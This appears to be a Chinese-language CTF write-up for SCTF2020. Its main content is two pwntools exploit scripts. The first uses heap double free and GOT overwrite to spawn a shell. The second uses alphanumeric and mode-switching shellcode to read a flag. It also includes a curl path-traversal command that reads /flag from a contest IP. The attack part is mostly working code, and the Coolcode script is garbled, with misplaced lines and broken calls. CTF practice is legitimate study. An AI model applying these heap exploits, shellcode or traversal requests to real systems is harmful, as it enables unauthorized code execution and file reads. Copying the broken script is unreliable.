SCTF2020
bestlanguage
有大师傅发现了直接读取~~
#root@iZ8vb0cjzcdx977svsnmimZ:~/web# curl --path-as-is http://39.104.93.188/index.php/tmp/../../flag
SCTF{B3st_1angu4g3_F0r_Uohhhhhhhhhh1l1l1}root@iZ8vb0cjzcdx977svsnmimZ:~/web#
Snake
在输入的地方有一次off by one的机会通过构造堆块重叠然后做2次double free改写got拿到shell
exp:
from pwn import *
p=remote('39.107.244.116',9999)
#p=process('./snake')
elf=ELF('./snake')
libc=elf.libc
def add(idx,size,data):
p.sendlineafter('name','1')
p.sendlineafter('?',str(idx))
p.sendlineafter('?',str(size))
p.sendafter('?',data)
def delete(idx):
p.sendlineafter('name','2')
p.sendlineafter('?',str(idx))
def get_name(idx):
p.sendlineafter('name','3')
p.sendlineafter('?',str(idx))
def start_game():
p.sendlineafter('name','4')
def if_exit(bol):
p.sendlineafter('exit?',bol)
p.sendlineafter('?',str(0x30))
p.sendafter('name','doudou')
for i in range(36):
p.send('\n')
p.sendafter('words:','a'*(0x4d-9)+p64(0)+'\xa1')
if_exit('n')
add(1,0x50,'aaaa')#0x602ffa
add(2,0x58,'aaaa')
add(3,0x50,'aaaa')
add(4,0x28,'aaaa')
delete(0)
add(0,0x30,'aaa')
add(5,0x50,'bbb')#5=2
delete(1)
delete(3)
delete(5)
add(1,0x50,p64(0x602ffa))
add(3,0x50,'aaa')
add(5,0x50,'bbb')
add(6,0x50,'\x11'*0xe)
get_name(6)
start_game()
for i in range(36):
p.send('\n')
#sleep(2)
libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['free']
log.success('libcbase: '+hex(libcbase))
system=libcbase+libc.sym['system']
if_exit('n')
delete(1)
delete(3)
delete(5)
add(1,0x50,p64(0x602ffa))
add(3,0x50,'aaa')
add(5,0x50,'/bin/sh\x00')
add(7,0x50,'a'*0xe+p64(system))
delete(5)
#p.sendafter('words:','a'*(0x4d-9)+p64(0)+'\xa1')
p.interactive()
print hex(libcbase)
Dou dizhu
这个题目地主赢了就有flag
直接开3个浏览器 一起玩硬拿flag
Can you hear
在ctf.show上面好像有相同的使用msstv工具
Coolcode
漏洞点是在申请堆块的时候会得到一个指针可能会把指针写到got表上面通过调用函数来调用shellcode但是shellcode需要shuzi和字母且长度有限制在比赛时未绕过等赛后观摩wp
from pwn import *
context.log_level = "debug"
context.arch = 'amd64'
elf = ELF("demo")
local = 0
if local:
p = process("./CoolCode")
else:
p = remote("39.107.119.192", 9999)
def db():
gdb.attach(p, 'b delete')
def choose(num):
p.sendlineafter("Your choice :", str(num))
def add(idx, mes):
choose(1)
p.sendlineafter("Index: ", str(idx))
p.sendafter("messages: ", mes)
def show(idx):
choose(2)
p.sendlineafter("Index: ", str(idx))
def delete(idx):
choose(3)
p.sendlineafter("Index: ", str(idx))
chunk_list = 0x602140
add(-37, "SX"+"RXWZ"+"4S0BD"+"SX4045"+"0BC"+"48420BB"+"XXX" +"UX")
#db()
'''
push
pop
rsp
rdx
xor
esi, DWORD PTR [edx]
push
pop
rdx
rax
xor
edi, DWORD PTR [eax]
push
pop
rbx
rax
xor
push
pop
al,0x5A
rax
rdx
push
pop
rbp
rax
push
'''
rsi
add(0,
add(1,
#db()
"TZ"+"32"+"RX"+"38"+"SX"+"4Z"+"PZ"+"UX")
"RZ"*7+"VVWX")#----
delete(0)
shellcode_mmap = '''
/*mmap(0x40000000,0x100,7,34,0,0)*/
push 0x40000000 /*set rdi*/
pop rdi
push 0x100 /*set rsi*/
pop rsi
push 7 /*set rdx*/
pop rdx
push 0x22 /*set rcx*/
pop r10
push 0 /*set r8*/
pop r8
push 0 /*set r9*/
pop r9
push 0x9
pop rax
syscall/*syscall*/
push rdi
pop rsi
push 0
pop rax
push 0x100
pop rdx
push 0
pop rdi
syscall
push rsi
ret
'''
p.sendline(asm(shellcode_mmap))
payload = '''
push 0x23
push 0x4000000b
pop rax
push rax
retfq
'''
open_shellcode = '''
mov esp, 0x40000100
xor ecx,ecx
xor edx,edx
mov eax,0x5
push 0x67616c66
mov ebx,esp
int 0x80
mov ecx,eax
'''
ret_64 = '''
push 0x33
push 0x40000030
retfq
nop
nop
nop
nop
nop
nop
'''
read_shellcode = '''
push 0x3;
pop rdi;
push 0x0;
pop rax;
push 0x40000200
pop rsi;
push 0x100;
pop rdx;
syscall;
'''
write_shellcode = '''
push 0x1
pop rdi
push 0x1
pop rax
syscall
'''
#db()
raw_input("write flag")
p.sendline(asm(payload)+asm(open_shellcode)+asm(ret_64)+asm(read_shellcode)+asm
(write_shellcode))
p.interactive()